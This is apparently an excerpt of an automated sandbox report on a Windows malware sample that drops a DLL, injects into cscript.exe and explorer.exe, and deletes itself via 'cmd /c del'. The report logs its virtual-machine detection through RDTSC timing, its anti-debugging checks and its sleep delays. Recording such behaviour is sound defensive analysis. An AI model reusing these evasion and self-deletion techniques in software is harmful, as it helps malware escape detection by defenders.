          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_004044C6 push eax; retf 1_1_004044C7
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_1_0041B7D5 push eax; ret 1_1_0041B828
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0546D0D1 push ecx; ret 6_2_0546D0E4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B822 push eax; ret 6_2_0123B828
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B82B push eax; ret 6_2_0123B892
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B88C push eax; ret 6_2_0123B892
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_01235094 push ds; iretd 6_2_01235095
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123A269 push ebx; retf 6_2_0123A26B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_012244C6 push eax; retf 6_2_012244C7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123C750 push es; iretd 6_2_0123C751
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0123B7D5 push eax; ret 6_2_0123B828
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: Y1p8VPvyU2.exeStatic PE information: real checksum: 0x0 should be: 0x5d471
          Source: msvofdls.dll.0.drStatic PE information: real checksum: 0x30354 should be: 0x25b81
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeFile created: C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del "C:\Users\user\Desktop\Y1p8VPvyU2.exe"
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000001228604 second address: 000000000122860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 000000000122899E second address: 00000000012289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6672 Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405250
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,0_2_00405C22
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: cscript.exe, 00000006.00000002.567306194.0000000003670000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.339354513.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_10011C4A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405C49
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10007C40 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapReAlloc,0_2_10007C40
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc 1_2_004088D0
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]1_2_00BD070D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]1_2_00BD070D
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]1_2_00B3A70E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]1_2_00B3A70E
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1FF60 mov eax, dword ptr fs:[00000030h]1_2_00B1FF60
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00BD8F6A mov eax, dword ptr fs:[00000030h]1_2_00BD8F6A
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B1EF40 mov eax, dword ptr fs:[00000030h]1_2_00B1EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05453D43 mov eax, dword ptr fs:[00000030h]6_2_05453D43
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05493540 mov eax, dword ptr fs:[00000030h]6_2_05493540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C3D40 mov eax, dword ptr fs:[00000030h]6_2_054C3D40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05437D50 mov eax, dword ptr fs:[00000030h]6_2_05437D50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]6_2_0543C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]6_2_0543C577
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541AD30 mov eax, dword ptr fs:[00000030h]6_2_0541AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DE539 mov eax, dword ptr fs:[00000030h]6_2_054DE539
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]6_2_05423D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8D34 mov eax, dword ptr fs:[00000030h]6_2_054E8D34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0549A537 mov eax, dword ptr fs:[00000030h]6_2_0549A537
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]6_2_05444D3B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov ecx, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]6_2_05496DC9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]6_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]6_2_0542D5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]6_2_054DFDE2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054C8DF1 mov eax, dword ptr fs:[00000030h]6_2_054C8DF1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]6_2_05442581
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]6_2_05412D8A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]6_2_0544FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]6_2_0544FD9B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]6_2_054E05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]6_2_054E05AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054435A1 mov eax, dword ptr fs:[00000030h]6_2_054435A1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]6_2_05441DB5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A44B mov eax, dword ptr fs:[00000030h]6_2_0544A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]6_2_054AC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]6_2_054AC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543746D mov eax, dword ptr fs:[00000030h]6_2_0543746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]6_2_054E740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]6_2_05496C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]6_2_054D1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544BC2C mov eax, dword ptr fs:[00000030h]6_2_0544BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8CD6 mov eax, dword ptr fs:[00000030h]6_2_054E8CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D14FB mov eax, dword ptr fs:[00000030h]6_2_054D14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]6_2_05496CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542849B mov eax, dword ptr fs:[00000030h]6_2_0542849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542EF40 mov eax, dword ptr fs:[00000030h]6_2_0542EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542FF60 mov eax, dword ptr fs:[00000030h]6_2_0542FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8F6A mov eax, dword ptr fs:[00000030h]6_2_054E8F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]6_2_054E070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]6_2_054E070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]6_2_0544A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]6_2_0544A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543F716 mov eax, dword ptr fs:[00000030h]6_2_0543F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]6_2_054AFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]6_2_054AFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]6_2_05414F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]6_2_05414F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544E730 mov eax, dword ptr fs:[00000030h]6_2_0544E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054537F5 mov eax, dword ptr fs:[00000030h]6_2_054537F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05428794 mov eax, dword ptr fs:[00000030h]6_2_05428794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]6_2_05497794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]6_2_05427E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]6_2_054DAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]6_2_054DAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542766D mov eax, dword ptr fs:[00000030h]6_2_0542766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]6_2_0543AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]6_2_0541C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05448E00 mov eax, dword ptr fs:[00000030h]6_2_05448E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1608 mov eax, dword ptr fs:[00000030h]6_2_054D1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]6_2_0544A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A61C mov eax, dword ptr fs:[00000030h]6_2_0544A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541E620 mov eax, dword ptr fs:[00000030h]6_2_0541E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFE3F mov eax, dword ptr fs:[00000030h]6_2_054CFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05458EC7 mov eax, dword ptr fs:[00000030h]6_2_05458EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054436CC mov eax, dword ptr fs:[00000030h]6_2_054436CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054CFEC0 mov eax, dword ptr fs:[00000030h]6_2_054CFEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8ED6 mov eax, dword ptr fs:[00000030h]6_2_054E8ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054276E2 mov eax, dword ptr fs:[00000030h]6_2_054276E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054416E0 mov ecx, dword ptr fs:[00000030h]6_2_054416E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFE87 mov eax, dword ptr fs:[00000030h]6_2_054AFE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E0EA5 mov eax, dword ptr fs:[00000030h]6_2_054E0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054946A7 mov eax, dword ptr fs:[00000030h]6_2_054946A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]6_2_0543B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543B944 mov eax, dword ptr fs:[00000030h]6_2_0543B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C962 mov eax, dword ptr fs:[00000030h]6_2_0541C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]6_2_0541B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541B171 mov eax, dword ptr fs:[00000030h]6_2_0541B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05419100 mov eax, dword ptr fs:[00000030h]6_2_05419100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov eax, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05434120 mov ecx, dword ptr fs:[00000030h]6_2_05434120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544513A mov eax, dword ptr fs:[00000030h]6_2_0544513A
